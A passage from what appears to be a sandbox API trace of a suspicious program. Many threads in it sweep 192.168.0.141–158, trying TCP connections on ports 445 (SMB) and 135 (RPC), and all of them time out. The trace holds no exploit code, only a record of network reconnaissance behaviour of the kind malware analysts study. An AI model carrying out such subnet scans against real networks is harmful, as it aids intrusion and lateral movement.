sin_port=0x1bd, sin_addr="192.168.0.158"), namelen=16) returned -1 [0091.249] WSAGetLastError () returned 10035 [0091.249] select (in: nfds=0, readfds=0x0, writefds=0xb76fd08, exceptfds=0xb76fe10, timeout=0xb76ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xb76fd08, exceptfds=0xb76fe10) returned 0 [0096.320] closesocket (s=0xba8) returned 0 [0096.321] inet_addr (cp="192.168.0.158") returned 0x9e00a8c0 [0096.321] htons (hostshort=0x87) returned 0x8700 [0096.321] socket (af=2, type=1, protocol=6) returned 0xba8 [0096.321] ioctlsocket (in: s=0xba8, cmd=-2147195266, argp=0xb76ff34 | out: argp=0xb76ff34) returned 0 [0096.321] connect (s=0xba8, name=0xb76ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.158"), namelen=16) returned -1 [0096.322] WSAGetLastError () returned 10035 [0096.322] select (in: nfds=0, readfds=0x0, writefds=0xb76fd08, exceptfds=0xb76fe10, timeout=0xb76ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xb76fd08, exceptfds=0xb76fe10) returned 0 [0101.435] closesocket (s=0xba8) returned 0 [0101.436] RtlExitUserThread (Status=0x0) Thread: id = 156 os_tid = 0xc5c [0091.249] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073570 [0091.249] free (_Block=0x2073570) [0091.249] inet_addr (cp="192.168.0.157") returned 0x9d00a8c0 [0091.249] htons (hostshort=0x1bd) returned 0xbd01 [0091.249] socket (af=2, type=1, protocol=6) returned 0xbb4 [0091.250] ioctlsocket (in: s=0xbb4, cmd=-2147195266, argp=0xb8aff34 | out: argp=0xb8aff34) returned 0 [0091.250] connect (s=0xbb4, name=0xb8aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.157"), namelen=16) returned -1 [0091.250] WSAGetLastError () returned 10035 [0091.250] select (in: nfds=0, readfds=0x0, writefds=0xb8afd08, exceptfds=0xb8afe10, timeout=0xb8aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xb8afd08, exceptfds=0xb8afe10) returned 0 [0096.319] closesocket (s=0xbb4) returned 0 [0096.319] inet_addr (cp="192.168.0.157") returned 0x9d00a8c0 [0096.320] htons (hostshort=0x87) returned 0x8700 [0096.320] socket (af=2, type=1, protocol=6) returned 0xbb4 [0096.320] ioctlsocket (in: s=0xbb4, cmd=-2147195266, argp=0xb8aff34 | out: argp=0xb8aff34) returned 0 [0096.320] connect (s=0xbb4, name=0xb8aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.157"), namelen=16) returned -1 [0096.320] WSAGetLastError () returned 10035 [0096.320] select (in: nfds=0, readfds=0x0, writefds=0xb8afd08, exceptfds=0xb8afe10, timeout=0xb8aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xb8afd08, exceptfds=0xb8afe10) returned 0 [0101.418] closesocket (s=0xbb4) returned 0 [0101.418] RtlExitUserThread (Status=0x0) Thread: id = 157 os_tid = 0xc60 [0091.251] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073548 [0091.251] free (_Block=0x2073548) [0091.251] inet_addr (cp="192.168.0.156") returned 0x9c00a8c0 [0091.251] htons (hostshort=0x1bd) returned 0xbd01 [0091.251] socket (af=2, type=1, protocol=6) returned 0xbc0 [0091.251] ioctlsocket (in: s=0xbc0, cmd=-2147195266, argp=0xb9eff34 | out: argp=0xb9eff34) returned 0 [0091.251] connect (s=0xbc0, name=0xb9eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.156"), namelen=16) returned -1 [0091.252] WSAGetLastError () returned 10035 [0091.252] select (in: nfds=0, readfds=0x0, writefds=0xb9efd08, exceptfds=0xb9efe10, timeout=0xb9eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xb9efd08, exceptfds=0xb9efe10) returned 0 [0096.336] closesocket (s=0xbc0) returned 0 [0096.336] inet_addr (cp="192.168.0.156") returned 0x9c00a8c0 [0096.336] htons (hostshort=0x87) returned 0x8700 [0096.336] socket (af=2, type=1, protocol=6) returned 0xbc0 [0096.336] ioctlsocket (in: s=0xbc0, cmd=-2147195266, argp=0xb9eff34 | out: argp=0xb9eff34) returned 0 [0096.336] connect (s=0xbc0, name=0xb9eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.156"), namelen=16) returned -1 [0096.337] WSAGetLastError () returned 10035 [0096.337] select (in: nfds=0, readfds=0x0, writefds=0xb9efd08, exceptfds=0xb9efe10, timeout=0xb9eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xb9efd08, exceptfds=0xb9efe10) returned 0 [0101.452] closesocket (s=0xbc0) returned 0 [0101.453] RtlExitUserThread (Status=0x0) Thread: id = 158 os_tid = 0xc64 [0091.276] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073520 [0091.276] free (_Block=0x2073520) [0091.276] inet_addr (cp="192.168.0.155") returned 0x9b00a8c0 [0091.276] htons (hostshort=0x1bd) returned 0xbd01 [0091.276] socket (af=2, type=1, protocol=6) returned 0xbcc [0091.276] ioctlsocket (in: s=0xbcc, cmd=-2147195266, argp=0xbb2ff34 | out: argp=0xbb2ff34) returned 0 [0091.276] connect (s=0xbcc, name=0xbb2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.155"), namelen=16) returned -1 [0091.277] WSAGetLastError () returned 10035 [0091.277] select (in: nfds=0, readfds=0x0, writefds=0xbb2fd08, exceptfds=0xbb2fe10, timeout=0xbb2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xbb2fd08, exceptfds=0xbb2fe10) returned 0 [0096.339] closesocket (s=0xbcc) returned 0 [0096.340] inet_addr (cp="192.168.0.155") returned 0x9b00a8c0 [0096.340] htons (hostshort=0x87) returned 0x8700 [0096.340] socket (af=2, type=1, protocol=6) returned 0xbcc [0096.340] ioctlsocket (in: s=0xbcc, cmd=-2147195266, argp=0xbb2ff34 | out: argp=0xbb2ff34) returned 0 [0096.340] connect (s=0xbcc, name=0xbb2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.155"), namelen=16) returned -1 [0096.341] WSAGetLastError () returned 10035 [0096.341] select (in: nfds=0, readfds=0x0, writefds=0xbb2fd08, exceptfds=0xbb2fe10, timeout=0xbb2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xbb2fd08, exceptfds=0xbb2fe10) returned 0 [0101.448] closesocket (s=0xbcc) returned 0 [0101.449] RtlExitUserThread (Status=0x0) Thread: id = 159 os_tid = 0xc68 [0091.279] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20734f8 [0091.279] free (_Block=0x20734f8) [0091.279] inet_addr (cp="192.168.0.154") returned 0x9a00a8c0 [0091.279] htons (hostshort=0x1bd) returned 0xbd01 [0091.279] socket (af=2, type=1, protocol=6) returned 0xbd8 [0091.279] ioctlsocket (in: s=0xbd8, cmd=-2147195266, argp=0xbc6ff34 | out: argp=0xbc6ff34) returned 0 [0091.279] connect (s=0xbd8, name=0xbc6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.154"), namelen=16) returned -1 [0091.280] WSAGetLastError () returned 10035 [0091.280] select (in: nfds=0, readfds=0x0, writefds=0xbc6fd08, exceptfds=0xbc6fe10, timeout=0xbc6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xbc6fd08, exceptfds=0xbc6fe10) returned 0 [0096.338] closesocket (s=0xbd8) returned 0 [0096.339] inet_addr (cp="192.168.0.154") returned 0x9a00a8c0 [0096.339] htons (hostshort=0x87) returned 0x8700 [0096.339] socket (af=2, type=1, protocol=6) returned 0xbd8 [0096.339] ioctlsocket (in: s=0xbd8, cmd=-2147195266, argp=0xbc6ff34 | out: argp=0xbc6ff34) returned 0 [0096.339] connect (s=0xbd8, name=0xbc6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.154"), namelen=16) returned -1 [0096.339] WSAGetLastError () returned 10035 [0096.339] select (in: nfds=0, readfds=0x0, writefds=0xbc6fd08, exceptfds=0xbc6fe10, timeout=0xbc6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xbc6fd08, exceptfds=0xbc6fe10) returned 0 [0101.449] closesocket (s=0xbd8) returned 0 [0101.450] RtlExitUserThread (Status=0x0) Thread: id = 160 os_tid = 0xc6c [0091.280] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20734d0 [0091.280] free (_Block=0x20734d0) [0091.280] inet_addr (cp="192.168.0.153") returned 0x9900a8c0 [0091.280] htons (hostshort=0x1bd) returned 0xbd01 [0091.280] socket (af=2, type=1, protocol=6) returned 0xbe4 [0091.280] ioctlsocket (in: s=0xbe4, cmd=-2147195266, argp=0xbdaff34 | out: argp=0xbdaff34) returned 0 [0091.280] connect (s=0xbe4, name=0xbdaff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.153"), namelen=16) returned -1 [0091.281] WSAGetLastError () returned 10035 [0091.281] select (in: nfds=0, readfds=0x0, writefds=0xbdafd08, exceptfds=0xbdafe10, timeout=0xbdaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xbdafd08, exceptfds=0xbdafe10) returned 0 [0096.337] closesocket (s=0xbe4) returned 0 [0096.337] inet_addr (cp="192.168.0.153") returned 0x9900a8c0 [0096.337] htons (hostshort=0x87) returned 0x8700 [0096.338] socket (af=2, type=1, protocol=6) returned 0xbe4 [0096.338] ioctlsocket (in: s=0xbe4, cmd=-2147195266, argp=0xbdaff34 | out: argp=0xbdaff34) returned 0 [0096.338] connect (s=0xbe4, name=0xbdaff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.153"), namelen=16) returned -1 [0096.338] WSAGetLastError () returned 10035 [0096.338] select (in: nfds=0, readfds=0x0, writefds=0xbdafd08, exceptfds=0xbdafe10, timeout=0xbdaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xbdafd08, exceptfds=0xbdafe10) returned 0 [0101.451] closesocket (s=0xbe4) returned 0 [0101.451] RtlExitUserThread (Status=0x0) Thread: id = 161 os_tid = 0xc70 [0091.281] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20734a8 [0091.281] free (_Block=0x20734a8) [0091.281] inet_addr (cp="192.168.0.152") returned 0x9800a8c0 [0091.281] htons (hostshort=0x1bd) returned 0xbd01 [0091.282] socket (af=2, type=1, protocol=6) returned 0xbf0 [0091.282] ioctlsocket (in: s=0xbf0, cmd=-2147195266, argp=0xbeeff34 | out: argp=0xbeeff34) returned 0 [0091.282] connect (s=0xbf0, name=0xbeeff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.152"), namelen=16) returned -1 [0091.283] WSAGetLastError () returned 10035 [0091.283] select (in: nfds=0, readfds=0x0, writefds=0xbeefd08, exceptfds=0xbeefe10, timeout=0xbeeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xbeefd08, exceptfds=0xbeefe10) returned 0 [0096.348] closesocket (s=0xbf0) returned 0 [0096.349] inet_addr (cp="192.168.0.152") returned 0x9800a8c0 [0096.349] htons (hostshort=0x87) returned 0x8700 [0096.349] socket (af=2, type=1, protocol=6) returned 0xbf0 [0096.349] ioctlsocket (in: s=0xbf0, cmd=-2147195266, argp=0xbeeff34 | out: argp=0xbeeff34) returned 0 [0096.349] connect (s=0xbf0, name=0xbeeff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.152"), namelen=16) returned -1 [0096.349] WSAGetLastError () returned 10035 [0096.349] select (in: nfds=0, readfds=0x0, writefds=0xbeefd08, exceptfds=0xbeefe10, timeout=0xbeeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xbeefd08, exceptfds=0xbeefe10) returned 0 [0101.438] closesocket (s=0xbf0) returned 0 [0101.439] RtlExitUserThread (Status=0x0) Thread: id = 162 os_tid = 0xc74 [0091.283] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073480 [0091.283] free (_Block=0x2073480) [0091.283] inet_addr (cp="192.168.0.151") returned 0x9700a8c0 [0091.283] htons (hostshort=0x1bd) returned 0xbd01 [0091.283] socket (af=2, type=1, protocol=6) returned 0xbfc [0091.283] ioctlsocket (in: s=0xbfc, cmd=-2147195266, argp=0xc02ff34 | out: argp=0xc02ff34) returned 0 [0091.284] connect (s=0xbfc, name=0xc02ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.151"), namelen=16) returned -1 [0091.284] WSAGetLastError () returned 10035 [0091.284] select (in: nfds=0, readfds=0x0, writefds=0xc02fd08, exceptfds=0xc02fe10, timeout=0xc02ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xc02fd08, exceptfds=0xc02fe10) returned 0 [0096.347] closesocket (s=0xbfc) returned 0 [0096.347] inet_addr (cp="192.168.0.151") returned 0x9700a8c0 [0096.347] htons (hostshort=0x87) returned 0x8700 [0096.348] socket (af=2, type=1, protocol=6) returned 0xbfc [0096.348] ioctlsocket (in: s=0xbfc, cmd=-2147195266, argp=0xc02ff34 | out: argp=0xc02ff34) returned 0 [0096.348] connect (s=0xbfc, name=0xc02ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.151"), namelen=16) returned -1 [0096.348] WSAGetLastError () returned 10035 [0096.348] select (in: nfds=0, readfds=0x0, writefds=0xc02fd08, exceptfds=0xc02fe10, timeout=0xc02ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xc02fd08, exceptfds=0xc02fe10) returned 0 [0101.439] closesocket (s=0xbfc) returned 0 [0101.440] RtlExitUserThread (Status=0x0) Thread: id = 163 os_tid = 0xc78 [0091.284] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073458 [0091.284] free (_Block=0x2073458) [0091.284] inet_addr (cp="192.168.0.150") returned 0x9600a8c0 [0091.284] htons (hostshort=0x1bd) returned 0xbd01 [0091.284] socket (af=2, type=1, protocol=6) returned 0xc0c [0091.286] ioctlsocket (in: s=0xc0c, cmd=-2147195266, argp=0xc16ff34 | out: argp=0xc16ff34) returned 0 [0091.286] connect (s=0xc0c, name=0xc16ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.150"), namelen=16) returned -1 [0091.287] WSAGetLastError () returned 10035 [0091.287] select (in: nfds=0, readfds=0x0, writefds=0xc16fd08, exceptfds=0xc16fe10, timeout=0xc16ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xc16fd08, exceptfds=0xc16fe10) returned 0 [0096.346] closesocket (s=0xc0c) returned 0 [0096.346] inet_addr (cp="192.168.0.150") returned 0x9600a8c0 [0096.346] htons (hostshort=0x87) returned 0x8700 [0096.346] socket (af=2, type=1, protocol=6) returned 0xc0c [0096.346] ioctlsocket (in: s=0xc0c, cmd=-2147195266, argp=0xc16ff34 | out: argp=0xc16ff34) returned 0 [0096.347] connect (s=0xc0c, name=0xc16ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.150"), namelen=16) returned -1 [0096.347] WSAGetLastError () returned 10035 [0096.347] select (in: nfds=0, readfds=0x0, writefds=0xc16fd08, exceptfds=0xc16fe10, timeout=0xc16ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xc16fd08, exceptfds=0xc16fe10) returned 0 [0101.441] closesocket (s=0xc0c) returned 0 [0101.441] RtlExitUserThread (Status=0x0) Thread: id = 164 os_tid = 0xc7c [0091.288] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073430 [0091.288] free (_Block=0x2073430) [0091.289] inet_addr (cp="192.168.0.149") returned 0x9500a8c0 [0091.289] htons (hostshort=0x1bd) returned 0xbd01 [0091.289] socket (af=2, type=1, protocol=6) returned 0xc18 [0091.289] ioctlsocket (in: s=0xc18, cmd=-2147195266, argp=0xc2aff34 | out: argp=0xc2aff34) returned 0 [0091.289] connect (s=0xc18, name=0xc2aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.149"), namelen=16) returned -1 [0091.289] WSAGetLastError () returned 10035 [0091.289] select (in: nfds=0, readfds=0x0, writefds=0xc2afd08, exceptfds=0xc2afe10, timeout=0xc2aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xc2afd08, exceptfds=0xc2afe10) returned 0 [0096.344] closesocket (s=0xc18) returned 0 [0096.345] inet_addr (cp="192.168.0.149") returned 0x9500a8c0 [0096.345] htons (hostshort=0x87) returned 0x8700 [0096.345] socket (af=2, type=1, protocol=6) returned 0xc18 [0096.345] ioctlsocket (in: s=0xc18, cmd=-2147195266, argp=0xc2aff34 | out: argp=0xc2aff34) returned 0 [0096.345] connect (s=0xc18, name=0xc2aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.149"), namelen=16) returned -1 [0096.345] WSAGetLastError () returned 10035 [0096.345] select (in: nfds=0, readfds=0x0, writefds=0xc2afd08, exceptfds=0xc2afe10, timeout=0xc2aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xc2afd08, exceptfds=0xc2afe10) returned 0 [0101.442] closesocket (s=0xc18) returned 0 [0101.443] RtlExitUserThread (Status=0x0) Thread: id = 165 os_tid = 0xc80 [0091.292] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073408 [0091.292] free (_Block=0x2073408) [0091.292] inet_addr (cp="192.168.0.148") returned 0x9400a8c0 [0091.292] htons (hostshort=0x1bd) returned 0xbd01 [0091.292] socket (af=2, type=1, protocol=6) returned 0xc24 [0091.292] ioctlsocket (in: s=0xc24, cmd=-2147195266, argp=0xc3eff34 | out: argp=0xc3eff34) returned 0 [0091.292] connect (s=0xc24, name=0xc3eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.148"), namelen=16) returned -1 [0091.293] WSAGetLastError () returned 10035 [0091.293] select (in: nfds=0, readfds=0x0, writefds=0xc3efd08, exceptfds=0xc3efe10, timeout=0xc3eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xc3efd08, exceptfds=0xc3efe10) returned 0 [0096.343] closesocket (s=0xc24) returned 0 [0096.344] inet_addr (cp="192.168.0.148") returned 0x9400a8c0 [0096.344] htons (hostshort=0x87) returned 0x8700 [0096.344] socket (af=2, type=1, protocol=6) returned 0xc24 [0096.344] ioctlsocket (in: s=0xc24, cmd=-2147195266, argp=0xc3eff34 | out: argp=0xc3eff34) returned 0 [0096.344] connect (s=0xc24, name=0xc3eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.148"), namelen=16) returned -1 [0096.344] WSAGetLastError () returned 10035 [0096.344] select (in: nfds=0, readfds=0x0, writefds=0xc3efd08, exceptfds=0xc3efe10, timeout=0xc3eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xc3efd08, exceptfds=0xc3efe10) returned 0 [0101.444] closesocket (s=0xc24) returned 0 [0101.444] RtlExitUserThread (Status=0x0) Thread: id = 166 os_tid = 0xc84 [0091.293] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20733e0 [0091.293] free (_Block=0x20733e0) [0091.293] inet_addr (cp="192.168.0.147") returned 0x9300a8c0 [0091.293] htons (hostshort=0x1bd) returned 0xbd01 [0091.293] socket (af=2, type=1, protocol=6) returned 0xc30 [0091.293] ioctlsocket (in: s=0xc30, cmd=-2147195266, argp=0xc52ff34 | out: argp=0xc52ff34) returned 0 [0091.293] connect (s=0xc30, name=0xc52ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.147"), namelen=16) returned -1 [0091.294] WSAGetLastError () returned 10035 [0091.294] select (in: nfds=0, readfds=0x0, writefds=0xc52fd08, exceptfds=0xc52fe10, timeout=0xc52ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xc52fd08, exceptfds=0xc52fe10) returned 0 [0096.342] closesocket (s=0xc30) returned 0 [0096.342] inet_addr (cp="192.168.0.147") returned 0x9300a8c0 [0096.342] htons (hostshort=0x87) returned 0x8700 [0096.342] socket (af=2, type=1, protocol=6) returned 0xc30 [0096.343] ioctlsocket (in: s=0xc30, cmd=-2147195266, argp=0xc52ff34 | out: argp=0xc52ff34) returned 0 [0096.343] connect (s=0xc30, name=0xc52ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.147"), namelen=16) returned -1 [0096.343] WSAGetLastError () returned 10035 [0096.343] select (in: nfds=0, readfds=0x0, writefds=0xc52fd08, exceptfds=0xc52fe10, timeout=0xc52ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xc52fd08, exceptfds=0xc52fe10) returned 0 [0101.445] closesocket (s=0xc30) returned 0 [0101.446] RtlExitUserThread (Status=0x0) Thread: id = 167 os_tid = 0xc88 [0091.294] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20733b8 [0091.294] free (_Block=0x20733b8) [0091.294] inet_addr (cp="192.168.0.146") returned 0x9200a8c0 [0091.294] htons (hostshort=0x1bd) returned 0xbd01 [0091.294] socket (af=2, type=1, protocol=6) returned 0xc3c [0091.295] ioctlsocket (in: s=0xc3c, cmd=-2147195266, argp=0xc66ff34 | out: argp=0xc66ff34) returned 0 [0091.295] connect (s=0xc3c, name=0xc66ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.146"), namelen=16) returned -1 [0091.295] WSAGetLastError () returned 10035 [0091.295] select (in: nfds=0, readfds=0x0, writefds=0xc66fd08, exceptfds=0xc66fe10, timeout=0xc66ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xc66fd08, exceptfds=0xc66fe10) returned 0 [0096.341] closesocket (s=0xc3c) returned 0 [0096.341] inet_addr (cp="192.168.0.146") returned 0x9200a8c0 [0096.341] htons (hostshort=0x87) returned 0x8700 [0096.341] socket (af=2, type=1, protocol=6) returned 0xc3c [0096.341] ioctlsocket (in: s=0xc3c, cmd=-2147195266, argp=0xc66ff34 | out: argp=0xc66ff34) returned 0 [0096.341] connect (s=0xc3c, name=0xc66ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.146"), namelen=16) returned -1 [0096.342] WSAGetLastError () returned 10035 [0096.342] select (in: nfds=0, readfds=0x0, writefds=0xc66fd08, exceptfds=0xc66fe10, timeout=0xc66ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xc66fd08, exceptfds=0xc66fe10) returned 0 [0101.446] closesocket (s=0xc3c) returned 0 [0101.447] RtlExitUserThread (Status=0x0) Thread: id = 168 os_tid = 0xc8c [0091.296] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073390 [0091.296] free (_Block=0x2073390) [0091.296] inet_addr (cp="192.168.0.144") returned 0x9000a8c0 [0091.296] htons (hostshort=0x1bd) returned 0xbd01 [0091.296] socket (af=2, type=1, protocol=6) returned 0xc48 [0091.297] ioctlsocket (in: s=0xc48, cmd=-2147195266, argp=0xc7aff34 | out: argp=0xc7aff34) returned 0 [0091.297] connect (s=0xc48, name=0xc7aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.144"), namelen=16) returned -1 [0091.298] WSAGetLastError () returned 10035 [0091.298] select (in: nfds=0, readfds=0x0, writefds=0xc7afd08, exceptfds=0xc7afe10, timeout=0xc7aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xc7afd08, exceptfds=0xc7afe10) returned 0 [0096.351] closesocket (s=0xc48) returned 0 [0096.351] inet_addr (cp="192.168.0.144") returned 0x9000a8c0 [0096.351] htons (hostshort=0x87) returned 0x8700 [0096.352] socket (af=2, type=1, protocol=6) returned 0xc48 [0096.352] ioctlsocket (in: s=0xc48, cmd=-2147195266, argp=0xc7aff34 | out: argp=0xc7aff34) returned 0 [0096.352] connect (s=0xc48, name=0xc7aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.144"), namelen=16) returned -1 [0096.352] WSAGetLastError () returned 10035 [0096.352] select (in: nfds=0, readfds=0x0, writefds=0xc7afd08, exceptfds=0xc7afe10, timeout=0xc7aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xc7afd08, exceptfds=0xc7afe10) returned 0 [0101.458] closesocket (s=0xc48) returned 0 [0101.459] RtlExitUserThread (Status=0x0) Thread: id = 169 os_tid = 0xc90 [0091.309] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073368 [0091.309] free (_Block=0x2073368) [0091.309] inet_addr (cp="192.168.0.143") returned 0x8f00a8c0 [0091.309] htons (hostshort=0x1bd) returned 0xbd01 [0091.309] socket (af=2, type=1, protocol=6) returned 0xc54 [0091.309] ioctlsocket (in: s=0xc54, cmd=-2147195266, argp=0xc8eff34 | out: argp=0xc8eff34) returned 0 [0091.309] connect (s=0xc54, name=0xc8eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.143"), namelen=16) returned -1 [0091.310] WSAGetLastError () returned 10035 [0091.310] select (in: nfds=0, readfds=0x0, writefds=0xc8efd08, exceptfds=0xc8efe10, timeout=0xc8eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xc8efd08, exceptfds=0xc8efe10) returned 0 [0096.350] closesocket (s=0xc54) returned 0 [0096.350] inet_addr (cp="192.168.0.143") returned 0x8f00a8c0 [0096.350] htons (hostshort=0x87) returned 0x8700 [0096.350] socket (af=2, type=1, protocol=6) returned 0xc54 [0096.350] ioctlsocket (in: s=0xc54, cmd=-2147195266, argp=0xc8eff34 | out: argp=0xc8eff34) returned 0 [0096.350] connect (s=0xc54, name=0xc8eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.143"), namelen=16) returned -1 [0096.351] WSAGetLastError () returned 10035 [0096.351] select (in: nfds=0, readfds=0x0, writefds=0xc8efd08, exceptfds=0xc8efe10, timeout=0xc8eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xc8efd08, exceptfds=0xc8efe10) returned 0 [0101.436] closesocket (s=0xc54) returned 0 [0101.437] RtlExitUserThread (Status=0x0) Thread: id = 170 os_tid = 0xc94 [0091.317] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073340 [0091.317] free (_Block=0x2073340) [0091.317] inet_addr (cp="192.168.0.142") returned 0x8e00a8c0 [0091.317] htons (hostshort=0x1bd) returned 0xbd01 [0091.317] socket (af=2, type=1, protocol=6) returned 0xc60 [0091.317] ioctlsocket (in: s=0xc60, cmd=-2147195266, argp=0xca2ff34 | out: argp=0xca2ff34) returned 0 [0091.317] connect (s=0xc60, name=0xca2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.142"), namelen=16) returned -1 [0091.318] WSAGetLastError () returned 10035 [0091.318] select (in: nfds=0, readfds=0x0, writefds=0xca2fd08, exceptfds=0xca2fe10, timeout=0xca2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xca2fd08, exceptfds=0xca2fe10) returned 0 [0096.355] closesocket (s=0xc60) returned 0 [0096.355] inet_addr (cp="192.168.0.142") returned 0x8e00a8c0 [0096.355] htons (hostshort=0x87) returned 0x8700 [0096.356] socket (af=2, type=1, protocol=6) returned 0xc60 [0096.358] ioctlsocket (in: s=0xc60, cmd=-2147195266, argp=0xca2ff34 | out: argp=0xca2ff34) returned 0 [0096.359] connect (s=0xc60, name=0xca2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.142"), namelen=16) returned -1 [0096.359] WSAGetLastError () returned 10035 [0096.359] select (in: nfds=0, readfds=0x0, writefds=0xca2fd08, exceptfds=0xca2fe10, timeout=0xca2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xca2fd08, exceptfds=0xca2fe10) returned 0 [0101.454] closesocket (s=0xc60) returned 0 [0101.454] RtlExitUserThread (Status=0x0) Thread: id = 171 os_tid = 0xc98 [0091.322] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073318 [0091.322] free (_Block=0x2073318) [0091.322] inet_addr (cp="192.168.0.141") returned 0x8d00a8c0 [0091.322] htons (hostshort=0x1bd) returned 0xbd01 [0091.322] socket (af=2, type=1, protocol=6) returned 0xc6c [0091.322] ioctlsocket (in: s=0xc6c, cmd=-2147195266, argp=0xcb6ff34 | out: argp=0xcb6ff34) returned 0 [0091.323] connect (s=0xc6c, name=0xcb6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.141"), namelen=16) returned -1 [0091.324] WSAGetLastError () returned 10035 [0091.324] select (in: nfds=0, readfds=0x0, writefds=0xcb6fd08, exceptfds=0xcb6fe10, timeout=0xcb6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0xcb6fd08, exceptfds=0xcb6fe10) returned 0 [0096.354] closesocket (s=0xc6c) returned 0 [0096.354] inet_addr (cp="192.168.0.141") returned 0x8d00a8c0 [0096.354] htons (hostshort=0x87) returned 0x8700 [0096.354] socket 